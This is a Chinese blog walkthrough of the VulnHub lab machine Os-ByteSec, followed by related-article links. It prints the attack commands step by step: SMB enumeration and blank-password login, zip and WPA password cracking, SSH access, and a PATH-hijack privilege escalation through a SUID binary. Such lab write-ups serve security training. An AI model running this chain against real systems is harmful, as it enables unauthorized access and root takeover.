Os-ByteSec

最新推荐文章于 2025-06-12 13:58:37 发布
最新推荐文章于 2025-06-12 13:58:37 发布
阅读量256 收藏
点赞数 4
分类专栏: vulnhub 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46029520/article/details/134480469
版权
文章描述了一次针对192.168.80.144靶机的渗透测试过程,包括主机发现、端口扫描、信息收集,重点关注SMB服务的渗透、密码破解以及最终权限提升,展示了黑客可能使用的工具和技术如enum4linux和aircrack-ng。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Os-ByteSec

一、主机发现和端口扫描

  • 主机发现,靶机地址192.168.80.144

    在这里插入图片描述

  • 端口扫描,开放了80、139、445、2525端口

    在这里插入图片描述

二、信息收集

  • 访问80端口

    在这里插入图片描述

  • 路径扫描

    dirsearch -u "http://192.168.80.144/" -e *

    在这里插入图片描述

  • 访问扫描出来的路径,没有发现有价值的信息

    http://192.168.80.144/css/         
http://192.168.80.144/gallery/    
http://192.168.80.144/html/                                    
http://192.168.80.144/img/        
http://192.168.80.144/index.html                                     
http://192.168.80.144/js/          
http://192.168.80.144/news/

  • 在网站下边发现了一个提示,是不是暗示着对SMB进行渗透

    在这里插入图片描述

三、SMB渗透

  • SMB是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通,它允许应用程序和终端用户从远端的文件服务器访问文件资源

  • 查询靶机中的用户信息

    enum4linux -U 192.168.80.144

enum4linux是用于枚举windows和Linux系统上的SMB服务的工具。可以轻松的从与SMB服务有关的目标中快速提取信息

    在这里插入图片描述

  • 爆破用户smb密码,密码为空

    acccheck -t 192.168.80.144 -u smb -v

    在这里插入图片描述

  • 枚举靶机的共享资源

    smbmap -u 'smb' -p '' -H 192.168.80.144

    在这里插入图片描述

  • 查看靶机的共享目录

    smbclient -L 192.168.80.144 -U smb

    在这里插入图片描述

  • 通过SMB登录靶机

    smbclient //192.168.80.144/print$ -U smb

    在这里插入图片描述

  • 发现里面的文件全是0字节,但是发现了一个.目录,是不是指定smb用户的家目录呢,试一下

    smbclient //192.168.80.144/smb -U smb

    在这里插入图片描述

  • 发现两个文件,其中main文件只有一个hello

    在这里插入图片描述

  • 将另一个文件下载下来

    在这里插入图片描述

四、密码破解

  • 尝试解压safe.zip,发现需要密码,爆破密码

    fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

或者

zip2john safe.zip > pass
john pass

密码hacker1

    在这里插入图片描述

    在这里插入图片描述

    在这里插入图片描述

  • 解压得到两个文件,secret.jpg和user.cap,图片没啥利用价值,使用wireshark打开user.cap文件进行分析,是个无线数据包,wifi名为blackjax,使用aircrack-ng破解user.cap文件,得到密码为snowflake

    aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap

    在这里插入图片描述

五、权限提升

  • 使用刚才得到的用户名密码登录ssh,得到第一个flag

    blackjax:snowflake
ssh blackjax@192.168.80.144 -p 2525

    在这里插入图片描述

  • 该用户不能执行sudo

    在这里插入图片描述

  • 查看系统中带SUID的程序

    find / -user root -perm -4000 -print 2>/dev/null

    在这里插入图片描述

  • 其中netscan比较可疑,执行该命令

    在这里插入图片描述

  • 下载并分析该文件,发现它调用了execve函数执行了netstat -antp命令

    scp -P 2525 blackjax@192.168.80.144:/usr/bin/netscan /tmp

strace -f /tmp/netscan

    在这里插入图片描述

    在这里插入图片描述

  • 通过劫持环境变量来让netscan在执行时执行其他命令

    # tmp有写权限
echo "/bin/sh" > /tmp/netstat
chmod 777 /tmp/netstat
export PATH=/tmp:$PATH 
netscan

  • 提权成功

    在这里插入图片描述

VulnHub靶机系列:Os-ByteSec
墨痕诉清风的博客
12-26 1350
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。主要突破点:通过SMB获取共享文件;通过爆破获取密码;从user.cap获取账户和密码;利用$PATH变量提权。
VulnHub—Os-Bytesec
weixin_39219503的博客
01-05 853
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-bytesec,393/ 题目信息如下,难度中等,需要获取俩个flag Difficulty : Intermediate Flag : 2 Flag first user And second root Learning : exploit | SMB | Enumration...
vulnhub靶机 Os-ByteSec
qq_52178795的博客
06-19 212
此靶场主要是对smb服务漏洞的利用
Hacknos-OS-Bytesec靶机渗透测试
weixin_58786230的博客
07-12 478
【代码】Hacknos-OS-Bytesec靶机渗透测试。
靶机hackNos Os-Bytesec练习报告1
08-08
id=1yBuih2CsBx45oTUDpFr4JldrzkaOTTeZ https://download.vulnhub.com/hacknos/Os-Byt
vulnhub靶场之hackNosOs-Bytesec
qq_34613171的博客
02-13 614
难度:中级 标记:2标记第一个用户和第二个根 学习:利用| 中小企业| 枚举 速记| 特权提升 联系…https://www.linkedin.com/in/rahulgehlaut/ 我们建议您对此虚拟机使用VirtualBox而不是VMware 做了端口扫描,发现开了 80 ,139 ,445 ,2525 这里可能有SMB共享。 2525是SSH。 查看页面源代码 ,发现提示 get s...
Vulnhub靶机随笔-OS-ByteSec
weixin_59005129的博客
03-11 969
咱们继续,这里又要用到一种提权姿势PATH提权 PATH是Linux和类Unix操作系统中的环境变量,它指定可执行程序的所有bin和sbin存储目录。当用户在终端上运行任何命令时,它会向shell发送请求以在PATH变量中搜索可执行文件来响应用户执行的命令。超级用户通常还可以使用/sbin和/usr/sbin以便于执行系统管理的命令。
张学飞靶机搭建.pdf
10-07
详述五种靶机的搭建方式,以windows2008服务器为环境,包括DVWA,MCIR,Pikachu,mutillidae,bWAPP。
2021-06-16靶机Os-ByteSec
qq_45290991的博客
06-16 285
一、信息收集 445开了想smb,永恒之蓝
Vulnhub:Os-Bytesec靶机渗透
m0_62008601的博客
12-04 1232
基本的渗透过程以及linux下的PATH环境变量提权
靶机测试Os-ByteSec笔记
qq_56426046的博客
01-05 937
139 445 为 smb 服务netBions name NITIN smbba4.3.11 Ubuntu。get main.txt safe.zip 通过 get 命令下载这两个文件。发现用户 sagar blackjax smb 把重点放在 smb 用户上。——比起自己的生命还要重要的东西,并不是这么好找的。这里面rockyou.txt.gz的解压命令是。可以匿名登录 同时发现存在 smb 用户。密码为空 用过命令 ls 列出当前文件。解压压缩包,发现两个文件。发现目标的端口服务器有。
靶机hackNos Os-Bytesec练习报告
黑战士的博客
05-21 1078
1. 之前只接触过windows下的smb漏洞,首次了linux下的smb的扫描和利用方式\2. 学习了suid的linux提权工具,多角度考虑提权方式,不要死磕一种方式。
守护数字世界:网络安全核心技术与实践策略
Thanks_ks 的嵌入式代码熔炉:炼出 STM32 到 RTOS 的极致效能!
06-10 805
本文剖析网络安全常见威胁如恶意软件、网络钓鱼等,详述加密、防火墙等核心技术,给出建立安全策略等实践策略,展望人工智能、物联网安全等未来趋势,助读者全面了解网络安全,提升防护能力与文件查找效率。
网络安全】SRC漏洞挖掘思路/手法分享
等风来
06-03 789
本文总结了多个实用的渗透测试技巧,涵盖接口安全、权限管理、数据泄露等多个方面。主要包括:主机URL复制差异、GET请求并发实现、密码明文获取方法、文件上传黑名单绕过、优惠券逻辑漏洞测试、用户信息越权访问、多重参数修改越权、复杂ID收集技巧、参数删除实现越权、权限管理参数空值测试、Cookie参数越权、Host头修改越权、并发测试场景、HTTP方法滥用、前端限制绕过、分隔符注入攻击、脏数据绕过频率限制、数组参数篡改以及邀请权限提升漏洞等
网络安全与防护》知识点复习
最新发布
wxy的博客
06-12 1318
网络安全与防护》知识点复习
网络安全之防病毒系统
anquan2233的博客
06-11 507
只要是继承了MyController都需要session但是后面有几个不需要鉴权的Controller除了MyController还有一个ApiController,此控制器下都是不需要鉴权的问题点用户注册来看用户相关的控制器UserController,前面的几个方法开头都需要获取session中的username或者eid,这些都不是我们可以利用的点往后看找到regUserAction方法,直接从request中获取了我们传入的参数进行解密。
windows压缩包爆破
08-13
- *2* [【甄选靶场】Vulnhub百个项目渗透——项目四十八:HACKNOSOS-BYTESEC(压缩包爆破,无线爆破,环境变量...](https://blog.youkuaiyun.com/weixin_65527369/article/details/127443994)[target="_blank" data-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值